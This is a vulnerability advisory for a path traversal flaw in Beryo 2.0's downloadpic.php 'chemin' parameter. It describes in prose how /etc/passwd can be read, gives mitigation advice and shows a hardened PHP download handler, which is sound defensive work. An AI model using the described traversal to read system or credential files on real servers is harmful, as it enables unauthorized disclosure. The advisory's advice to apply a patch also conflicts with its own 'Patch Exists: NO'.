Vendor: Beryo
By: GolD_M
CVSS: 5.5 (MEDIUM)
Type: Remote File Disclosure
CWE: 22
Product Name: Beryo
Affected Version From: Beryo 2.0
Affected Version To: Beryo 2.0
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Platforms Tested: Not available
Year: 2007
Beryo 2.0 (downloadpic.php chemin) Remote File Disclosure Vulnerability
Beryo 2.0 contains a path traversal vulnerability that allows remote attackers to read files from the server. The 'chemin' parameter of the 'downloadpic.php' script is used to locate the file to serve without being confined to the intended directory, so an attacker can traverse the directory structure and access sensitive files such as the password file ('/etc/passwd'). The vulnerability is exploited by sending a crafted request to the server with a path traversal sequence in the parameter value.
Mitigation:
To mitigate this vulnerability, it is recommended to update to a patched version of Beryo or apply any security patches provided by the vendor. Additionally, it is advised to restrict the web server's access to sensitive files and directories on the server to prevent unauthorized disclosure.
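As an added example (not Beryo's code), the following PHP download handler shows how a parameter like 'chemin' can be confined to a fixed directory so that traversal sequences cannot reach files such as '/etc/passwd'. The base directory, the constant name and the response headers are assumptions for illustration.

```php
<?php
// Hypothetical hardened replacement for a downloadpic.php-style handler.
// BASE_DIR is an assumed location; adjust it to the real image directory.
const BASE_DIR = '/var/www/beryo/pictures';

/**
 * Resolve $relative under $baseDir and return its canonical absolute path,
 * or null if the result escapes $baseDir or is not a regular file.
 */
function resolveSafePath(string $baseDir, string $relative): ?string
{
    // Reject NUL bytes (they truncate C-level paths) and absolute paths.
    if (strpos($relative, "\0") !== false || strpos($relative, '/') === 0) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses '..' segments and follows symlinks, so a
    // traversal attempt resolves to a path outside $base and is rejected
    // by the prefix check below. It returns false for non-existent paths.
    $full = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Compare against "$base/" so a sibling such as "/pictures2" does not
    // pass as a prefix match of "/pictures".
    if (strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $full;
}

$path = resolveSafePath(BASE_DIR, $_GET['chemin'] ?? '');
if ($path === null) {
    // Do not echo the requested path back; a generic 404 avoids leaking
    // information about the filesystem layout.
    http_response_code(404);
    exit('Not found');
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

Requests whose resolved path falls outside the base directory, or that name something other than an existing regular file, are answered with a plain 404 rather than the file contents.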